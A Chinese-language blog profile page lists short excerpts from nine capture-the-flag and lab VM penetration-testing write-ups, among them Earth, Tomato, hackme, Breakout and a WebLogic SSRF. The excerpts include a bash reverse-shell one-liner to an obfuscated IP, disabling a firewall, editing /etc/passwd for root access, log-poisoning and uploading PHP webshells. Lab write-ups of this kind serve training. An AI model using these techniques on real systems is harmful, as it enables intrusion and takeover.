- 博客(9)
- 收藏
- 关注
原创 pyexp靶机渗透测试
这个靶机没有web服务,所以说得从其他端口服务入手。测试mysql时,mysql渗透中的一些敏感函数:\!, load_file(), do_system()要注意。拿到shell,提权时观察到了敏感函数exec,利用Python函数,本地提权。
2025-02-27 17:35:18
645
原创 DepthB2R靶机渗透测试
ssh bill@localhost sudo ufw disable 关闭防火墙(前面加ssh是因为没有登录,这里需要用bill的身份登录并执行关闭防火墙的命令)说明是安装了中间件tomcat,想一下是否存在tomcat中间件漏洞,我们尝试在功能点处访问一下。发现里面有ssh,说明存在ssh连接,只不过之前的端口扫描没有扫描出来。说明有可能是防火墙开着,挡住了ssh连接,尝试关闭一下防火墙。显示的让我们输入 ls-l/tmp,我们来输入一下。出现了8080端口,我们访问一下。
2025-02-25 22:20:47
390
原创 basic_pentesting_1靶机渗透测试
此时我们相到刚才的etc/passwd/中的root里面有一个x,说明是密码占位符,密码其实是加密存储在etc/shadow下的,假设密码存在的是x位,那么系统就会直接访问etc/passwd来获得密码,而不用访问etc/shadow了。既然是wordpress搭建的漏洞,我们可以diesearch一下它的二级域名。接下来回到刚才的会话,edit /etc/passwd 将x修改成下面的密文。可以看到最前面变成了 vtcsec,我们要重新换上目标靶机的IP。所以我们现在就是要修改x,修改成我们知道的。
2025-02-25 11:29:48
208
原创 Earth靶机渗透测试
最终的语句为 bash -c 'exec bash -i &>/dev/tcp/0xc0.0xa8.0xd9.0x80/7777 <&1'这应该就是密码,通过上网查证可知这是使用xor密码加密后的内容,所以我们要进行解密。400的错误一般是两种原因,一种是错误的请求方式,另一种是不存在的域名。补充:当我们在浏览器中打开一个需要登陆的网站的时候,系统会首先从。而此前显示的用户名为terra,我们考虑肯定是有一个用户登录网站。查到了有80端口、443端口、22端口,我们访问一下。
2025-02-15 12:54:20
467
原创 Tomato靶机渗透测试
image=/etc/passwd/ 出现以下信息。发现错误,但是/var/log/auth.log 是一个错误日志,里面有显示。5、远程连接一下,同时把一句话木马写进去,看能不能上传成功。发现还有一个2211端口 对应的是ssh远程连协议。是一个登录界面,尝试弱口令登陆一下,发现没什么用。查看一下页面源代码 发现里面有文件包含漏洞。发现有3个端口 21、80、8888。我们用centos7来测试一下。没有,用dirb扫描一下吧。访问一下info.php。成功拿到了这个网站的信息。大概率说明木马写入成功。
2025-02-14 16:50:36
173
原创 hackme靶机渗透测试
此时我们可以写入一个shell.php文件,该文件包含一句话木马。我们可以利用dirsearch/dirb来继续扫描一下这个IP。发现有22端口和80端口,对应的协议分别为ssh http。这里有一个superadmin 把这个的密码MD5解码一下。arp-scan -l 扫描该此时网段下存活的主机和ip。我们想到还有一个/uploads/还没看,打开看一下。虚拟机中打开安装好的镜像文件,同时打开kali。出现了以下的子域名,我们访问一下。进入发现了一个可以上传文件的按钮。扫描一下该IP存在的端口。
2025-02-12 23:47:08
244
原创 SSRF漏洞(CVE-2014-4210)
将该payload进行url编码 ( ip是kali的IP 7777是自己在kali上设置的端口)开启Centos7-->打开vulhub-master-->进入weblogic-->ssrf。将operator参数中的url修改为redies对应服务器的端口。查看正在运行的容器,看到了redies服务(6379)对应的端口。利用抓包软件进行抓包(在框中输入内容-->search)将编码好的payload写入刚才的operator后面。Send之后就看到了已经监听上了。从回应包中看到了接收到了url。
2025-02-10 17:30:20
221
原创 EMPIRE:BREAKOUT渗透测试
7、在刚才的解码中我们找到了一个密码,又在刚才找到了一个用户名,而10000和20000又都是登陆界面,所以我们可以尝试登录一下。80端口是一个apache页面,我们看一下有没有什么信息,发现并没有什么信息,可以再看一下网页的源代码。Cd 进去又说没有这样的文件,而tar本身有很多权限,所以说明可读有其他文件,通过其他文件可以看tar。可以知道它具有读取⽂件的⼀个功能。有一个这样的文件,发现没有可执行的权限,但是刚才的tar有可执行的权限。(其中的ip地址是kali的ip地址,6666是刚才设置的端口)
2025-02-09 17:59:03
659
原创 BadStore_123渗透测试
在注册用户时,发现注册用户的角色是可以选择的,尝试直接注册管理员账户 失败,登录后和普通用户没有区别。在这个页面中,我们可以将原ip地址的后缀改成下面的,依次尝试一下。对获取到的账户密码进行解码并登录测试,发现全部失败 登录需要邮箱。注册用户,测试登陆时是否存在POST类型的SQL注入。用dirsearch 扫描目标ip,发现有如下信息。发现在未登录状态下,可以直接通过用户名进行修改密码。在这里发现下面有个accounts,点开看一下。发现有一个搜索栏,登录界面,注册界面。
2025-02-01 12:20:41
205
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人